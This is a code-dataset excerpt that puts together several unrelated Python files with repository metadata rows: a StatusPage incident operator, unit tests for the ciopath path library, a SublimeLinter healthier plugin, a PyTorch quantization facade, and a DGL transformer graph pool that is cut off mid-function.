        self.client.updateComponent(componentId, payload)

    def _filter_set(self, incidents, componentId):
        def iterator_func(incident):
            for comp in incident.components:
                if comp.id == componentId:
                    return True
            return False
        return filter(iterator_func, incidents)

    def _getAssociatedIncident(self, componentId):
        result = self.client.getUnresolvedIncidents()
        return list(self._filter_set(result, componentId))

    def _processIncidentOnStatusChange(self, componentId: str, newComponentStatus: str, incidentDetails: Incident) -> IncidentResult:
        '''Create or Close incidents based on the incoming component status

        For now, if it's operational, close open incidents, and if it's not operational, create a new
        ticket if one isn't already open for this component. Future state will involve more detail around outage and maintenance
        '''
        incidentResult = IncidentResult()
        incidentResult.incident = incidentDetails
        associatedIncidents = self._getAssociatedIncident(componentId)
        asscIncidentCount = len(associatedIncidents)
        logger.info("Associated Incidents for %s: %d",
                    componentId, asscIncidentCount)

        if (newComponentStatus == "operational" and asscIncidentCount > 0):
            for incident in associatedIncidents:
                self._closeIncident(incident.id)
                incidentResult.incidentResolved = True
        elif (newComponentStatus == "major_outage" and asscIncidentCount == 0):
            self._createIncident(
                componentId, newComponentStatus, incidentDetails)
            incidentResult.incidentCreated = True

        return incidentResult

    def _closeIncident(self, incidentId):
        logger.info("Closing incident %s", incidentId)
        payload = {"incident": {"status": "resolved"}}
        self.client.updateIncident(incidentId, payload)

    def _createIncident(self, componentId, newComponentStatus: str, incidentDetails: Incident):
        logger.info("Creating incident: Component %s - New Component Status %s",
                    componentId, newComponentStatus)
        payload = {"incident":
                   {
                       "name": incidentDetails.name,
                       "status": "investigating",
                       "body": incidentDetails.description,
                       "component_ids": [componentId],
                       "components": {componentId: newComponentStatus}
                   }}
        self.client.createIncident(payload)
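# --- Editor's usage sketch (hedged; key, page and component IDs are
# placeholders, and the settings attribute names follow the config class
# used above) ---
# settings = configuration.StatusPageSettings()
# settings.apiKey = "<api-key>"
# settings.pageId = "<page-id>"
# operator = StatusPageOperator(settings)
# if operator.IsConfigured():
#     incident = Incident()
#     incident.name = "API check failed"
#     incident.description = "Automated monitor detected an outage."
#     # OpLevel.Operational resolves any open incident for the component;
#     # any other OpLevel value would open one instead.
#     result = operator.UpdateComponentStatus("<component-id>", OpLevel.Operational, incident)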
| 38.85
| 223
| 0.674775
| 7,630
| 0.981982
| 0
| 0
| 0
| 0
| 0
| 0
| 3,233
| 0.416088
|
b188895e8bd69c46255cb2668635f56b60539874
| 14,875
|
py
|
Python
|
tests/test_gpath.py
|
ConductorTechnologies/ciopath
|
574bfc38859cc68a80b98f8b0cf0d9aeddb646e5
|
[
"MIT"
] | 1
|
2020-10-13T07:50:19.000Z
|
2020-10-13T07:50:19.000Z
|
tests/test_gpath.py
|
ConductorTechnologies/ciopath
|
574bfc38859cc68a80b98f8b0cf0d9aeddb646e5
|
[
"MIT"
] | null | null | null |
tests/test_gpath.py
|
ConductorTechnologies/ciopath
|
574bfc38859cc68a80b98f8b0cf0d9aeddb646e5
|
[
"MIT"
] | null | null | null |
""" test gpath
isort:skip_file
"""
import os
import sys
import unittest
try:
from unittest import mock
except ImportError:
import mock
SRC = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "src")
if SRC not in sys.path:
sys.path.insert(0, SRC)
from ciopath.gpath import Path
sys.modules["glob"] = __import__("mocks.glob", fromlist=["dummy"])
class BadInputTest(unittest.TestCase):
def test_empty_input(self):
with self.assertRaises(ValueError):
self.p = Path("")
class RootPath(unittest.TestCase):
def test_root_path(self):
self.p = Path("/")
self.assertEqual(self.p.fslash(), "/")
self.assertEqual(self.p.bslash(), "\\")
def test_drive_letter_root_path(self):
self.p = Path("C:\\")
self.assertEqual(self.p.fslash(), "C:/")
self.assertEqual(self.p.bslash(), "C:\\")
class SpecifyDriveLetterUse(unittest.TestCase):
def test_remove_from_path(self):
self.p = Path("C:\\a\\b\\c")
self.assertEqual(self.p.fslash(with_drive=False), "/a/b/c")
self.assertEqual(self.p.bslash(with_drive=False), "\\a\\b\\c")
def test_remove_from_root_path(self):
self.p = Path("C:\\")
self.assertEqual(self.p.fslash(with_drive=False), "/")
self.assertEqual(self.p.bslash(with_drive=False), "\\")
class AbsPosixPathTest(unittest.TestCase):
def setUp(self):
self.p = Path("/a/b/c")
def test_fslash_out(self):
self.assertEqual(self.p.fslash(), "/a/b/c")
def test_win_path_out(self):
self.assertEqual(self.p.bslash(), "\\a\\b\\c")
class AbsWindowsPathTest(unittest.TestCase):
def setUp(self):
self.p = Path("C:\\a\\b\\c")
def test_fslash_out(self):
self.assertEqual(self.p.fslash(), "C:/a/b/c")
def test_win_path_out(self):
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c")
# consider just testing on both platforms
def test_os_path_out(self):
with mock.patch("os.name", "posix"):
self.assertEqual(self.p.os_path(), "C:/a/b/c")
with mock.patch("os.name", "nt"):
self.assertEqual(self.p.os_path(), "C:\\a\\b\\c")
class PathStringTest(unittest.TestCase):
def test_path_emits_string_posix(self):
input_file = "/path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
def test_path_emits_string_with_drive(self):
input_file = "C:/path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
def test_path_emits_string_relative(self):
input_file = "path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
class WindowsMixedPathTest(unittest.TestCase):
def test_abs_in_fslash_out(self):
self.p = Path("\\a\\b\\c/d/e")
self.assertEqual(self.p.fslash(), "/a/b/c/d/e")
def test_abs_in_bslash_out(self):
self.p = Path("\\a\\b\\c/d/e")
self.assertEqual(self.p.bslash(), "\\a\\b\\c\\d\\e")
def test_letter_abs_in_fslash_out(self):
self.p = Path("C:\\a\\b\\c/d/e")
self.assertEqual(self.p.fslash(), "C:/a/b/c/d/e")
def test_letter_abs_in_bslash_out(self):
self.p = Path("C:\\a\\b\\c/d/e")
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c\\d\\e")
class MiscPathTest(unittest.TestCase):
def test_many_to_single_backslashes_bslash_out(self):
self.p = Path("C:\\\\a\\b///c")
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c")
class PathExpansionTest(unittest.TestCase):
def setUp(self):
self.env = {
"HOME": "/users/joebloggs",
"SHOT": "/metropolis/shot01",
"DEPT": "texturing",
}
def test_posix_tilde_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("~/a/b/c")
self.assertEqual(self.p.fslash(), "/users/joebloggs/a/b/c")
def test_posix_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c")
self.assertEqual(self.p.fslash(), "/metropolis/shot01/a/b/c")
def test_posix_two_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/$DEPT/c")
self.assertEqual(self.p.fslash(), "/metropolis/shot01/a/b/texturing/c")
def test_windows_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$HOME\\a\\b\\c")
self.assertEqual(self.p.bslash(), "\\users\\joebloggs\\a\\b\\c")
self.assertEqual(self.p.fslash(), "/users/joebloggs/a/b/c")
def test_tilde_no_expand(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("~/a/b/c", no_expand=True)
self.assertEqual(self.p.fslash(), "~/a/b/c")
def test_posix_var_no_expand(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=True)
self.assertEqual(self.p.fslash(), "$SHOT/a/b/c")
def no_expand_variable_considered_relative(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=True)
self.assertTrue(self.p.relative)
self.assertFalse(self.p.absolute)
def expanded_variable_considered_absolute(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=False)
self.assertFalse(self.p.relative)
self.assertTrue(self.p.absolute)
class PathContextExpansionTest(unittest.TestCase):
def setUp(self):
self.env = {
"HOME": "/users/joebloggs",
"SHOT": "/metropolis/shot01",
"DEPT": "texturing",
}
self.context = {
"HOME": "/users/janedoe",
"FOO": "fooval",
"BAR_FLY1_": "bar_fly1_val",
"ROOT_DIR": "/some/root",
}
def test_path_replaces_context(self):
self.p = Path("$ROOT_DIR/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/thefile.jpg")
def test_path_replaces_multiple_context(self):
self.p = Path("$ROOT_DIR/$BAR_FLY1_/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/thefile.jpg")
def test_path_context_overrides_env(self):
self.p = Path("$HOME/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/users/janedoe/thefile.jpg")
def test_path_leave_unknown_variable_in_tact(self):
self.p = Path("$ROOT_DIR/$BAR_FLY1_/$FOO/thefile.$F.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/fooval/thefile.$F.jpg")
def test_path_replaces_context_braces(self):
self.p = Path("${ROOT_DIR}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/thefile.jpg")
def test_path_replaces_multiple_context_braces(self):
self.p = Path("${ROOT_DIR}/${BAR_FLY1_}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/thefile.jpg")
def test_path_context_overrides_env_braces(self):
self.p = Path("${HOME}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/users/janedoe/thefile.jpg")
def test_path_leave_unknown_variable_in_tact_braces(self):
self.p = Path("${ROOT_DIR}/${BAR_FLY1_}/${FOO}/thefile.$F.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/fooval/thefile.$F.jpg")
class PathLengthTest(unittest.TestCase):
def test_len_with_drive_letter(self):
self.p = Path("C:\\aaa\\bbb/c")
self.assertEqual(len(self.p), 12)
def test_len_with_no_drive_letter(self):
self.p = Path("\\aaa\\bbb/c")
self.assertEqual(len(self.p), 10)
def test_depth_with_drive_letter(self):
self.p = Path("C:\\aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
def test_depth_with_no_drive_letter(self):
self.p = Path("\\aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
def test_depth_with_literal_rel_path(self):
self.p = Path("aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
class AbsolutePathCollapseDotsTest(unittest.TestCase):
def test_path_collapses_single_dot(self):
p = Path("/a/b/./c")
self.assertEqual(p.fslash(), "/a/b/c")
def test_path_collapses_double_dot(self):
p = Path("/a/b/../c")
self.assertEqual(p.fslash(), "/a/c")
def test_path_collapses_many_single_dots(self):
p = Path("/a/b/./c/././d")
self.assertEqual(p.fslash(), "/a/b/c/d")
def test_path_collapses_many_consecutive_double_dots(self):
p = Path("/a/b/c/../../d")
self.assertEqual(p.fslash(), "/a/d")
def test_path_collapses_many_non_consecutive_double_dots(self):
p = Path("/a/b/c/../../d/../e/f/../g")
self.assertEqual(p.fslash(), "/a/e/g")
def test_path_collapses_many_non_consecutive_mixed_dots(self):
p = Path("/a/./b/c/../.././d/../././e/f/../g/./")
self.assertEqual(p.fslash(), "/a/e/g")
self.assertEqual(p.depth, 3)
def test_path_collapses_to_root(self):
p = Path("/a/b/../../")
self.assertEqual(p.fslash(), "/")
self.assertEqual(p.depth, 0)
def test_raise_when_collapse_too_many_dots(self):
with self.assertRaises(ValueError):
Path("/a/b/../../../")
class RelativePathCollapseDotsTest(unittest.TestCase):
def test_resolve_relative_several_dots(self):
p = Path("./a/b/../../../c/d")
self.assertEqual(p.fslash(), "../c/d")
self.assertEqual(p.all_components, ["..", "c", "d"])
self.assertEqual(p.depth, 3)
def test_resolve_leading_relative_dots(self):
p = Path("../c/d")
self.assertEqual(p.fslash(), "../c/d")
def test_resolve_leading_relative_dots(self):
p = Path("../../../c/d")
self.assertEqual(p.fslash(), "../../../c/d")
def test_resolve_only_relative_dots(self):
p = Path("../../../")
self.assertEqual(p.fslash(), "../../../")
def test_collapse_contained_components(self):
p = Path("../../../a/b/../../../")
self.assertEqual(p.fslash(), "../../../../")
def test_remove_trailing_dot(self):
p = Path("../../.././")
self.assertEqual(p.fslash(), "../../../")
def test_cwd(self):
p = Path(".")
self.assertEqual(p.fslash(), "./")
def test_down_up_cwd(self):
p = Path("a/..")
self.assertEqual(p.fslash(), "./")
def test_up_down_sibling(self):
p = Path("../a")
self.assertEqual(p.fslash(), "../a")
def test_up_down_sibling_bslash(self):
p = Path("../a")
self.assertEqual(p.bslash(), "..\\a")
class PathComponentsTest(unittest.TestCase):
def test_path_gets_tail(self):
p = Path("/a/b/c")
self.assertEqual(p.tail, "c")
def test_path_gets_none_when_no_tail(self):
p = Path("/")
self.assertEqual(p.tail, None)
def test_path_ends_with(self):
p = Path("/a/b/cdef")
self.assertTrue(p.endswith("ef"))
def test_path_not_ends_with(self):
p = Path("/a/b/cdef")
self.assertFalse(p.endswith("eg"))
class RelativePathTest(unittest.TestCase):
def test_rel_path_does_not_raise(self):
p = Path("a/b/c")
self.assertEqual(p.fslash(), "a/b/c")
class EqualityTests(unittest.TestCase):
def test_paths_equal(self):
p1 = Path("a/b/c")
p2 = Path("a/b/c")
self.assertTrue(p1 == p2)
def test_same_object_equal(self):
p1 = Path("a/b/c")
self.assertTrue(p1 == p1)
def test_different_paths_equal_false(self):
p1 = Path("a/b/c")
p2 = Path("a/b/d")
self.assertFalse(p1 == p2)
def test_paths_not_equal(self):
p1 = Path("a/b/c")
p2 = Path("a/b/d")
self.assertTrue(p1 != p2)
class InitializeWithComponentsTests(unittest.TestCase):
def test_initialize_with_lettered_components(self):
p = Path(["C:", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "C:/a/b/c")
def test_initialize_with_backslash_unc_components(self):
p = Path(["\\", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_initialize_with_fwslash_unc_components(self):
p = Path(["/", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_initialize_with_unc_components(self):
p = Path(["/", "a", "b", "c"])
self.assertEqual(p.bslash(with_drive=True), "\\\\a\\b\\c")
def test_initialize_with_relative_components(self):
p = Path(["a", "b", "c"])
self.assertEqual(p.bslash(with_drive=True), "a\\b\\c")
def test_initialize_with_relative_components_is_relative(self):
p = Path(["a", "b", "c"])
self.assertTrue(p.relative)
self.assertFalse(p.absolute)
class GetComponentsTests(unittest.TestCase):
def test_get_all_components(self):
p = Path("/a/b/c")
self.assertEqual(p.all_components, ["a", "b", "c"])
def test_get_all_components_with_drive(self):
p = Path("C:/a/b/c")
self.assertEqual(p.all_components, ["C:", "a", "b", "c"])
def test_get_all_components_with_unc_fwslash(self):
p = Path("//a/b/c")
self.assertEqual(p.all_components, ["/", "a", "b", "c"])
def test_get_all_components_with_unc_backslash(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.all_components, ["/", "a", "b", "c"])
class UNCTests(unittest.TestCase):
def test_unc_root_with_drive(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_unc_is_absolute(self):
p = Path("\\\\a\\b\\c")
self.assertTrue(p.absolute)
def test_unc_root_without_drive(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.fslash(with_drive=False), "/a/b/c")
def test_unc_root_with_forward(self):
p = Path("//a/b/c")
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_is_unc(self):
p = Path("\\\\a\\b\\c")
self.assertTrue(p.is_unc)
p = Path("//a/b/c")
self.assertTrue(p.is_unc)
def test_posix_abs_is_not_unc(self):
p = Path(["/a/b/c"])
self.assertFalse(p.is_unc)
def test_relative_is_not_unc(self):
p = Path(["a/b/c"])
self.assertFalse(p.is_unc)
def test_drive_letter_is_not_unc(self):
p = Path("C:\\aaa\\bbb\\c")
self.assertFalse(p.is_unc)
if __name__ == "__main__":
unittest.main()
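# Editor's note (hedged): with the mocks package importable as arranged at the
# top of the file, the suite runs standalone, e.g.:
#
#   python tests/test_gpath.py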
| 32.620614
| 93
| 0.604034
| 14,379
| 0.966655
| 0
| 0
| 0
| 0
| 0
| 0
| 2,547
| 0.171227
|
b188abfaae0783909143fd3975f59d921af7acbd
| 3,513
|
py
|
Python
|
linter.py
|
KidkArolis/SublimeLinter-contrib-healthier
|
5b912af5f9afca85de86d709c46d3e566057823f
|
[
"MIT"
] | null | null | null |
linter.py
|
KidkArolis/SublimeLinter-contrib-healthier
|
5b912af5f9afca85de86d709c46d3e566057823f
|
[
"MIT"
] | 3
|
2019-01-25T15:21:38.000Z
|
2019-01-30T23:52:11.000Z
|
linter.py
|
KidkArolis/SublimeLinter-contrib-healthier
|
5b912af5f9afca85de86d709c46d3e566057823f
|
[
"MIT"
] | null | null | null |
"""This module exports the Healthier plugin class."""
import json
import logging
import re
import shlex
from SublimeLinter.lint import NodeLinter
logger = logging.getLogger('SublimeLinter.plugin.healthier')
class Healthier(NodeLinter):
"""Provides an interface to the healthier executable."""
# instead of using cmd feature of SublimeLinter
# we implement a custom run, that doesn't show error
# in the status bar in case a local healthier binary
# is not found
cmd = None
_cmd = 'healthier --format json --stdin'
line_col_base = (1, 1)
defaults = {
'selector': 'source.js - meta.attribute-with-value',
'disable_if_not_dependency': True
}
def run(self, cmd, code):
cmd = shlex.split(self._cmd)
cmd = self.build_cmd(cmd)
if not cmd:
return []
return self.communicate(cmd, code)
def on_stderr(self, stderr):
if (
'DeprecationWarning' in stderr
or 'ExperimentalWarning' in stderr
or 'in the next version' in stderr # is that a proper deprecation?
):
logger.warning(stderr)
else:
logger.error(stderr)
self.notify_failure()
def find_errors(self, output):
"""Parse errors from linter's output."""
try:
# It is possible that users output debug messages to stdout, so we
# only parse the last line, which is hopefully the actual healthier
# output.
# https://github.com/SublimeLinter/SublimeLinter-eslint/issues/251
last_line = output.rstrip().split('\n')[-1]
content = json.loads(last_line)
except ValueError:
logger.error(
"JSON Decode error: We expected JSON from 'healthier', "
"but instead got this:\n{}\n\n"
"Be aware that we only parse the last line of above "
"output.".format(output))
self.notify_failure()
return
if logger.isEnabledFor(logging.INFO):
import pprint
logger.info(
'{} output:\n{}'.format(self.name, pprint.pformat(content)))
for entry in content:
for match in entry['messages']:
if match['message'].startswith('File ignored'):
continue
column = match.get('column', None)
ruleId = match.get('ruleId', '')
if column is not None:
# apply line_col_base manually
column = column - 1
yield (
match,
match['line'] - 1, # apply line_col_base manually
column,
ruleId if match['severity'] == 2 else '',
ruleId if match['severity'] == 1 else '',
match['message'],
None # near
)
def reposition_match(self, line, col, m, vv):
match = m.match
if (
col is None
or 'endLine' not in match
or 'endColumn' not in match
):
return super().reposition_match(line, col, m, vv)
# apply line_col_base manually
end_line = match['endLine'] - 1
end_column = match['endColumn'] - 1
for _line in range(line, end_line):
text = vv.select_line(_line)
end_column += len(text)
return line, col, end_column
| 32.831776
| 79
| 0.545687
| 3,302
| 0.939937
| 1,729
| 0.492172
| 0
| 0
| 0
| 0
| 1,151
| 0.32764
|
b188c34a63c4e8f52180a384c6fb116f6a431c46
| 7,184
|
py
|
Python
|
model_compression_toolkit/gptq/pytorch/quantization_facade.py
|
ofirgo/model_optimization
|
18be895a35238df128913183b05e60550c2b6e6b
|
[
"Apache-2.0"
] | 42
|
2021-10-31T10:17:49.000Z
|
2022-03-21T08:51:46.000Z
|
model_compression_toolkit/gptq/pytorch/quantization_facade.py
|
ofirgo/model_optimization
|
18be895a35238df128913183b05e60550c2b6e6b
|
[
"Apache-2.0"
] | 6
|
2021-10-31T15:06:03.000Z
|
2022-03-31T10:32:53.000Z
|
model_compression_toolkit/gptq/pytorch/quantization_facade.py
|
ofirgo/model_optimization
|
18be895a35238df128913183b05e60550c2b6e6b
|
[
"Apache-2.0"
] | 18
|
2021-11-01T12:16:43.000Z
|
2022-03-25T16:52:37.000Z
|
# Copyright 2022 Sony Semiconductors Israel, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from typing import Callable
from model_compression_toolkit.core import common
from model_compression_toolkit.core.common import Logger
from model_compression_toolkit.core.common.constants import PYTORCH
from model_compression_toolkit.gptq.common.gptq_config import GradientPTQConfig
from model_compression_toolkit.core.common.target_platform import TargetPlatformCapabilities
from model_compression_toolkit.core.common.mixed_precision.kpi import KPI
from model_compression_toolkit.core.common.framework_info import FrameworkInfo
from model_compression_toolkit import CoreConfig
from model_compression_toolkit.core.common.mixed_precision.mixed_precision_quantization_config import \
MixedPrecisionQuantizationConfigV2
from model_compression_toolkit.core.common.post_training_quantization import post_training_quantization
import importlib
if importlib.util.find_spec("torch") is not None:
from model_compression_toolkit.core.pytorch.default_framework_info import DEFAULT_PYTORCH_INFO
from model_compression_toolkit.core.pytorch.pytorch_implementation import PytorchImplementation
from model_compression_toolkit.core.pytorch.constants import DEFAULT_TP_MODEL
from torch.nn import Module
from model_compression_toolkit import get_target_platform_capabilities
DEFAULT_PYTORCH_TPC = get_target_platform_capabilities(PYTORCH, DEFAULT_TP_MODEL)
def pytorch_gradient_post_training_quantization_experimental(in_module: Module,
representative_data_gen: Callable,
target_kpi: KPI = None,
core_config: CoreConfig = CoreConfig(),
fw_info: FrameworkInfo = DEFAULT_PYTORCH_INFO,
gptq_config: GradientPTQConfig = None,
target_platform_capabilities: TargetPlatformCapabilities = DEFAULT_PYTORCH_TPC):
"""
Quantize a trained Pytorch module using post-training quantization.
    By default, the module is quantized using symmetric constraint quantization thresholds
(power of two) as defined in the default TargetPlatformCapabilities.
The module is first optimized using several transformations (e.g. BatchNormalization folding to
    preceding layers). Then, using a given dataset, statistics (e.g. min/max, histogram, etc.) are
    collected for each layer's output (and input, depending on the quantization configuration).
    Thresholds are then calculated from the collected statistics, and the module is quantized
    (both coefficients and activations by default).
If gptq_config is passed, the quantized weights are optimized using gradient based post
training quantization by comparing points between the float and quantized modules, and minimizing the
observed loss.
Args:
in_module (Module): Pytorch module to quantize.
representative_data_gen (Callable): Dataset used for calibration.
target_kpi (KPI): KPI object to limit the search of the mixed-precision configuration as desired.
core_config (CoreConfig): Configuration object containing parameters of how the model should be quantized, including mixed precision parameters.
fw_info (FrameworkInfo): Information needed for quantization about the specific framework (e.g., kernel channels indices, groups of layers by how they should be quantized, etc.). `Default PyTorch info <https://github.com/sony/model_optimization/blob/main/model_compression_toolkit/core/pytorch/default_framework_info.py>`_
gptq_config (GradientPTQConfig): Configuration for using gptq (e.g. optimizer).
target_platform_capabilities (TargetPlatformCapabilities): TargetPlatformCapabilities to optimize the PyTorch model according to. `Default PyTorch TPC <https://github.com/sony/model_optimization/blob/main/model_compression_toolkit/core/tpc_models/pytorch_tp_models/pytorch_default.py>`_
Returns:
A quantized module and information the user may need to handle the quantized module.
Examples:
Import a Pytorch module:
        >>> from torchvision.models import mobilenet_v2
        >>> module = mobilenet_v2()
Create a random dataset generator:
>>> import numpy as np
        >>> def repr_datagen(): return [np.random.random((1, 3, 224, 224))]
Import mct and pass the module with the representative dataset generator to get a quantized module:
>>> import model_compression_toolkit as mct
        >>> quantized_module, quantization_info = mct.pytorch_gradient_post_training_quantization_experimental(module, repr_datagen)
"""
if core_config.mixed_precision_enable:
if not isinstance(core_config.mixed_precision_config, MixedPrecisionQuantizationConfigV2):
common.Logger.error("Given quantization config to mixed-precision facade is not of type "
"MixedPrecisionQuantizationConfigV2. Please use pytorch_post_training_quantization API,"
"or pass a valid mixed precision configuration.")
common.Logger.info("Using experimental mixed-precision quantization. "
"If you encounter an issue please file a bug.")
return post_training_quantization(in_module,
representative_data_gen,
core_config,
fw_info,
PytorchImplementation(),
target_platform_capabilities,
gptq_config,
target_kpi=target_kpi)
else:
# If torch is not installed,
# we raise an exception when trying to use these functions.
def pytorch_gradient_post_training_quantization_experimental(*args, **kwargs):
Logger.critical('Installing Pytorch is mandatory '
'when using pytorch_gradient_post_training_quantization_experimental. '
'Could not find the torch package.')
| 60.369748
| 334
| 0.680122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,064
| 0.565702
|
b188f10ec381323c6265f65bdee66f4fcf49a96c
| 11,472
|
py
|
Python
|
transformer/dataset/graph.py
|
tmpaul06/dgl
|
8f458464b0e14c78978db4b91590e8ca718c5ec6
|
[
"Apache-2.0"
] | 1
|
2019-03-15T07:25:09.000Z
|
2019-03-15T07:25:09.000Z
|
transformer/dataset/graph.py
|
tmpaul06/dgl
|
8f458464b0e14c78978db4b91590e8ca718c5ec6
|
[
"Apache-2.0"
] | null | null | null |
transformer/dataset/graph.py
|
tmpaul06/dgl
|
8f458464b0e14c78978db4b91590e8ca718c5ec6
|
[
"Apache-2.0"
] | null | null | null |
import dgl
import torch as th
import numpy as np
import itertools
import time
from collections import *
Graph = namedtuple('Graph',
['g', 'src', 'tgt', 'tgt_y', 'nids', 'eids', 'nid_arr', 'n_nodes', 'n_edges', 'n_tokens', 'layer_eids'])
# We need to create new graph pools for relative position attention (ngram style)
def dedupe_tuples(tups):
try:
return list(set([(a, b) if a < b else (b, a) for a, b in tups]))
except ValueError:
raise Exception(tups)
def get_src_dst_deps(src_deps, order=1):
if not isinstance(src_deps, list):
src_deps = [src_deps]
# If order is one, then we simply return src_deps
if order == 1:
return list(set(src_deps))
else:
new_deps = list()
for src, dst in src_deps:
# Go up one order. i.e make dst the src, and find its parent
for src_dup, dst_dup in src_deps:
if dst_dup == dst and src != src_dup:
new_deps.append((src, src_dup))
elif src_dup == src and dst != dst_dup:
new_deps.append((dst, dst_dup))
elif dst == src_dup and src != dst_dup:
new_deps.append((src, dst_dup))
return list(set(get_src_dst_deps(new_deps, order=order - 1)).difference(set(src_deps)))
class GraphPool:
"Create a graph pool in advance to accelerate graph building phase in Transformer."
def __init__(self, n=50, m=50):
'''
args:
n: maximum length of input sequence.
m: maximum length of output sequence.
'''
print('start creating graph pool...')
tic = time.time()
self.n, self.m = n, m
g_pool = [[dgl.DGLGraph() for _ in range(m)] for _ in range(n)]
num_edges = {
'ee': np.zeros((n, n)).astype(int),
'ed': np.zeros((n, m)).astype(int),
'dd': np.zeros((m, m)).astype(int)
}
for i, j in itertools.product(range(n), range(m)):
src_length = i + 1
tgt_length = j + 1
g_pool[i][j].add_nodes(src_length + tgt_length)
enc_nodes = th.arange(src_length, dtype=th.long)
dec_nodes = th.arange(tgt_length, dtype=th.long) + src_length
# enc -> enc
us = enc_nodes.unsqueeze(-1).repeat(1, src_length).view(-1)
vs = enc_nodes.repeat(src_length)
g_pool[i][j].add_edges(us, vs)
num_edges['ee'][i][j] = len(us)
# enc -> dec
us = enc_nodes.unsqueeze(-1).repeat(1, tgt_length).view(-1)
vs = dec_nodes.repeat(src_length)
g_pool[i][j].add_edges(us, vs)
num_edges['ed'][i][j] = len(us)
# dec -> dec
indices = th.triu(th.ones(tgt_length, tgt_length)) == 1
us = dec_nodes.unsqueeze(-1).repeat(1, tgt_length)[indices]
vs = dec_nodes.unsqueeze(0).repeat(tgt_length, 1)[indices]
g_pool[i][j].add_edges(us, vs)
num_edges['dd'][i][j] = len(us)
print('successfully created graph pool, time: {0:0.3f}s'.format(time.time() - tic))
self.g_pool = g_pool
self.num_edges = num_edges
def beam(self, src_buf, start_sym, max_len, k, device='cpu', src_deps=None):
'''
Return a batched graph for beam search during inference of Transformer.
args:
src_buf: a list of input sequence
start_sym: the index of start-of-sequence symbol
max_len: maximum length for decoding
k: beam size
device: 'cpu' or 'cuda:*'
'''
if src_deps is None:
src_deps = list()
g_list = []
src_lens = [len(_) for _ in src_buf]
tgt_lens = [max_len] * len(src_buf)
num_edges = {'ee': [], 'ed': [], 'dd': []}
for src_len, tgt_len in zip(src_lens, tgt_lens):
i, j = src_len - 1, tgt_len - 1
for _ in range(k):
g_list.append(self.g_pool[i][j])
for key in ['ee', 'ed', 'dd']:
num_edges[key].append(int(self.num_edges[key][i][j]))
g = dgl.batch(g_list)
src, tgt = [], []
src_pos, tgt_pos = [], []
enc_ids, dec_ids = [], []
layer_eids = {
'dep': [[], []]
}
e2e_eids, e2d_eids, d2d_eids = [], [], []
n_nodes, n_edges, n_tokens = 0, 0, 0
for src_sample, src_dep, n, n_ee, n_ed, n_dd in zip(src_buf, src_deps, src_lens, num_edges['ee'], num_edges['ed'], num_edges['dd']):
for _ in range(k):
src.append(th.tensor(src_sample, dtype=th.long, device=device))
src_pos.append(th.arange(n, dtype=th.long, device=device))
enc_ids.append(th.arange(n_nodes, n_nodes + n, dtype=th.long, device=device))
n_nodes += n
e2e_eids.append(th.arange(n_edges, n_edges + n_ee, dtype=th.long, device=device))
# Copy the ids of edges that correspond to a given node and its previous N nodes
# We are using arange here. This will not work. Instead we need to select edges that
# correspond to previous positions. This information is present in graph pool
# For each edge, we need to figure out source_node_id and target_node_id.
if src_dep:
for i in range(0, 2):
for src_node_id, dst_node_id in dedupe_tuples(get_src_dst_deps(src_dep, i + 1)):
layer_eids['dep'][i].append(n_edges + src_node_id * n + dst_node_id)
layer_eids['dep'][i].append(n_edges + dst_node_id * n + src_node_id)
n_edges += n_ee
tgt_seq = th.zeros(max_len, dtype=th.long, device=device)
tgt_seq[0] = start_sym
tgt.append(tgt_seq)
tgt_pos.append(th.arange(max_len, dtype=th.long, device=device))
dec_ids.append(th.arange(n_nodes, n_nodes + max_len, dtype=th.long, device=device))
n_nodes += max_len
e2d_eids.append(th.arange(n_edges, n_edges + n_ed, dtype=th.long, device=device))
n_edges += n_ed
d2d_eids.append(th.arange(n_edges, n_edges + n_dd, dtype=th.long, device=device))
